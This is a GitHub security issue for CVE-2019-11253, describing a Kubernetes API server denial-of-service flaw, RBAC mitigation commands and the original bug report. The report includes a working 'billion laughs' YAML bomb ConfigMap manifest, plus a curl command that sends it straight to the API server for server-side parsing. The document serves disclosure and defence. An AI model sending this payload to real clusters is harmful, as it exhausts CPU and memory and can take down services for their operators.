
CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack #83253

Description

@raesene

CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users who send malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy.

Affected versions:

All four patch releases are now available.

Fixed in master by #83261

Mitigation:

Requests that are rejected by authorization do not trigger the vulnerability, so restricting authorization rules and/or access to the Kubernetes API server limits which users are able to trigger this vulnerability.

To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation, or as an additional protection for an upgraded cluster, save the attached file as rbac.yaml, and run:

kubectl auth reconcile -f rbac.yaml --remove-extra-subjects --remove-extra-permissions 

Note: this removes the ability for unauthenticated users to use kubectl auth can-i
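
The rbac.yaml attachment is not reproduced in this issue body. As an illustration only (an assumption about its contents, not the official file), the v1.14+ restrictive policy drops system:unauthenticated from the discovery-related bindings, so a minimal rbac.yaml along these lines would bind system:basic-user to authenticated users only:

# Illustrative sketch, not the attached file: bind system:basic-user
# to the system:authenticated group only, dropping system:unauthenticated.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: system:basic-user
  annotations:
    rbac.authorization.kubernetes.io/autoupdate: "true"
  labels:
    kubernetes.io/bootstrapping: rbac-defaults
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:basic-user
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:authenticated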

If you are running a version prior to v1.14.0:

  • in addition to installing the restrictive policy, turn off autoupdate for this clusterrolebinding so your changes aren’t replaced on an API server restart:
    kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=false
  • after upgrading to v1.14.0 or greater, you can remove this annotation to reenable autoupdate:
    kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=true
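
One way to confirm that the reconciled binding no longer includes unauthenticated subjects is to inspect it directly:

kubectl get clusterrolebinding system:basic-user -o yaml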

=============

Original description follows:

Introduction

Posting this as an issue following a report to the security list, who suggested raising it here since it's already public in a Stack Overflow question.

What happened:

When creating a ConfigMap object that contains recursive anchor/alias references, excessive CPU usage can occur. This appears to be an instance of a "Billion Laughs" attack, which is well known as an XML parsing issue: each level of aliases multiplies the expanded size, so the nine levels of nine-element aliases in the manifest below expand to 9^9 (roughly 387 million) list entries.

Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.

apiVersion: v1
data:
  a: &a ["web","web","web","web","web","web","web","web","web"]
  b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
  c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
  d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
  e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
  f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
  g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
  h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
  i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
  name: yaml-bomb
  namespace: default

What you expected to happen:

Ideally, a maximum expanded entity size would be enforced, or some limit placed on recursive alias references in YAML parsed by kubectl.

One note: the original poster on Stack Overflow indicated that the resource consumption was in kube-apiserver, but both tests I did (a 1.16 client against a 1.15 kubeadm cluster, and a 1.16 client against a 1.16 kubeadm cluster) showed the CPU usage client-side, presumably because kubectl expands the YAML anchors itself before sending the request.
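
To exercise the server-side parser rather than kubectl's client-side conversion, the raw YAML can be POSTed to the API server directly, since it accepts application/yaml request bodies. This is only a sketch: $APISERVER, $TOKEN, and yaml-bomb.yaml are placeholders for a cluster endpoint, a bearer token allowed to create ConfigMaps, and the manifest above saved to a file.

# Sketch: send the manifest as raw YAML so the API server performs the YAML parsing.
curl -k -X POST "$APISERVER/api/v1/namespaces/default/configmaps" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/yaml" \
  --data-binary @yaml-bomb.yaml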

How to reproduce it (as minimally and precisely as possible):

Get the manifest above and apply to a cluster as normal with kubectl create -f <manifest>. Use top or another CPU monitor to observe the quantity of CPU time used.

Anything else we need to know?:

Environment:

  • Kubernetes version (use kubectl version):

Test 1 (Linux AMD64 client, kubeadm cluster running in kind)

Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.0", GitCommit:"e8462b5b5dc2584fdcd18e6bcfe9f1e4d970a529", GitTreeState:"clean", BuildDate:"2019-06-25T23:41:27Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"linux/amd64"}

Test 2 (Linux AMD64 client, kubeadm cluster running in VMware Workstation)

Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:27:17Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}

Labels

  • area/apiserver
  • area/client-libraries
  • area/security
  • kind/bug
  • official-cve-feed
  • priority/critical-urgent
  • sig/api-machinery
